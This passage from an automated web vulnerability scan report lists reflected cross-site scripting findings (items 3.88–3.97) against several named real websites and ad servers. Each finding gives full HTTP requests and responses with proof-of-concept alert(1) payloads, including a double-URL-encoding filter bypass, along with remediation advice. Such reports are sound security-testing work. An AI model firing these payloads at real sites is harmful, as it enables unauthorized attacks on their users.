/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif
Issue detail
The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 was submitted in the REST URL parameter 5. This input was echoed as 17276><img src=a onerror=alert(1)>abf137323f7 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 HTTP/1.1 Host: www.harbottle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:49:26 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Length: 5165 Connection: close Content-Type: text/html <body margin=0> <div id="blanket" style="display:none;"></div> <meta name="section" content="" /> <div id="main"> <div id="header"> <div class="w-left"> <a href="pages/...[SNIP]... <a href=http://www.harbottle.com/hnl/preview/pages/L500 Logo.gif17276><img src=a onerror=alert(1)>abf137323f7 .php class=fineprint style="text-decoration:none">...[SNIP]...
3.88. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/pubs/479
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b was submitted in the REST URL parameter 4. This input was echoed as b38f5\"><script>alert(1)</script>ed437b2915b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hnl/pages/pubs/479b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b HTTP/1.1 Host: www.harbottle.com Proxy-Connection: keep-alive Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:45:14 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Connection: close Content-Type: text/html Content-Length: 12483 <p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"><script>alert(1)</script>ed437b29...[SNIP]... <img src="pix/headers/Publications.jpg" alt="banner image - Publications1055:479b38f5\"><script>alert(1)</script>ed437b2915b " />...[SNIP]...
3.89. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/pubs/479
Issue detail
The value of REST URL parameter 4 is copied into an HTML comment. The payload 345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 was submitted in the REST URL parameter 4. This input was echoed as 345e0--><script>alert(1)</script>f416c8577e6 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hnl/pages/pubs/479345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 HTTP/1.1 Host: www.harbottle.com Proxy-Connection: keep-alive Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:45:18 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Connection: close Content-Type: text/html Content-Length: 12502 <p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>f416c8577e...[SNIP]... <!-- contact box 1055 479345e0--><script>alert(1)</script>f416c8577e6 -->...[SNIP]...
3.90. http://www.linkedin.com/countserv/count/share [url parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.linkedin.com
Path:
/countserv/count/share
Issue detail
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf was submitted in the url parameter. This input was echoed as 25dc9<img src=a onerror=alert(1)>4460fcf0bcf in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /countserv/count/share?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf HTTP/1.1 Host: www.linkedin.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 15:33:10 GMT Content-Length: 155 IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.readwriteweb.com\/enterprise\/2010\/11\/oracle.php25dc9<img src=a onerror=alert(1)>4460fcf0bcf "});
3.91. http://www.sapient.com/en-us/search.html [search parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sapient.com
Path:
/en-us/search.html
Issue detail
The value of the search request parameter is copied into the name of an HTML tag attribute. The payload 71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a was submitted in the search parameter. This input was echoed as 71cf5 style=x:expression(alert(1)) 041bb562a4a in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /en-us/search.html?search=xss%20contact%20faq%20phone71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a HTTP/1.1 Host: www.sapient.com Proxy-Connection: keep-alive Referer: http://www.sapient.com/en-us/search.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.3.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; locale=en-us
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:37:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:49 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45804 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head...[SNIP]... <a title'Next' href=/en-us/search.html?search=xss contact faq phone71cf5 style=x:expression(alert(1)) 041bb562a4a &PageIndex=2>...[SNIP]...
3.92. http://api.bizographics.com/v1/profile.json [Referer HTTP header]
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://api.bizographics.com
Path:
/v1/profile.json
Issue detail
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c9c69<script>alert(1)</script>856d1048244 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callback HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: c9c69<script>alert(1)</script>856d1048244 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizographicsOptOut=OPT_OUT
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Tue, 06 Sep 2011 15:33:18 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Content-Length: 58 Connection: keep-alive Unknown Referer: c9c69<script>alert(1)</script>856d1048244
3.93. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e053a"-alert(1)-"60aad715d99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=4749&campId=176996 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A5B13C6DD2625ADC8DB86B9CC1C99F3C; Path=/ Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:05:42 GMT Connection: close var adsafeVisParams = { mode : "jspix", jsref : "http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99 ", adsafeSrc : "", adsafeSep : "", requrl : "http://pixel.adsafeprotected.com/", reqquery : "anId=144&pubId=4749&campId=176996", debug : "false", allowPhoneHome : "true", phoneHomeDelay : "3000"...[SNIP]...
3.94. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/6451/11953/20435-15.js
Issue detail
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 685de"-alert(1)-"60e51d37b2a was submitted in the ruid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=685de"-alert(1)-"60e51d37b2a ; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:10 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=9844^2&11953^260; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61369; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=1300434.js^5^1315321030^1315321030&1295121.js^3^1315321030^1315321030&2553663.js^5^1315321026^1315321026&1295156.js^3^1315320939^1315321026&638177.js^2^1315313132^-1612641032; expires=Tue, 13-Sep-2011 14:57:10 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 1842 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl); window.rubicon_ad = "1300434" ...[SNIP]... <img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=685de"-alert(1)-"60e51d37b2a \" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>...[SNIP]...
3.95. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/6451/11953/20435-2.js
Issue detail
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dcb9"-alert(1)-"3db46c88d9f was submitted in the ruid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=1dcb9"-alert(1)-"3db46c88d9f ; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:46 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses2=9844^231c9a%00%0d%0a98f953b2934&11953^5; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61333; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=1300433.js^18^1315321062^1315321066&1295118.js^3^1315321062^1315321062&2553662.js^5^1315321061^1315321061&1295153.js^3^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^-1612640932; expires=Tue, 13-Sep-2011 14:57:46 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 1842 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl); window.rubicon_ad = "1300433" ...[SNIP]... <img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=1dcb9"-alert(1)-"3db46c88d9f \" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>...[SNIP]...
3.96. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/dk.html
Issue detail
The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67a75"><script>alert(1)</script>5b71f4343a7 was submitted in the ruid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=67a75"><script>alert(1)</script>5b71f4343a7 ; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:59:10 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=9844^2&11953^744f40729e51a8caac2210640; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61249; path=/; domain=.rubiconproject.com Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: text/html Content-Length: 1785 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="expires" content="0"> <style type="text/css"> body {margin:0px; padding:0px;} </style> <script type="tex...[SNIP]... <img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=67a75"><script>alert(1)</script>5b71f4343a7 " style="display: none;" border="0" height="1" width="1" alt=""/>...[SNIP]...
3.97. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/dk.js
Issue detail
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e19"-alert(1)-"aad8da393bf was submitted in the ruid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=f1e19"-alert(1)-"aad8da393bf ; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:16:02 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=9844^2&11953^1044f407298942487860d6b793; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60237; path=/; domain=.rubiconproject.com Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 1716 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl); window.rubicon_ad = "3158455" ...[SNIP]... <img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=f1e19"-alert(1)-"aad8da393bf \" style=\"display: none;\" border=\"0\" height=\"1\" 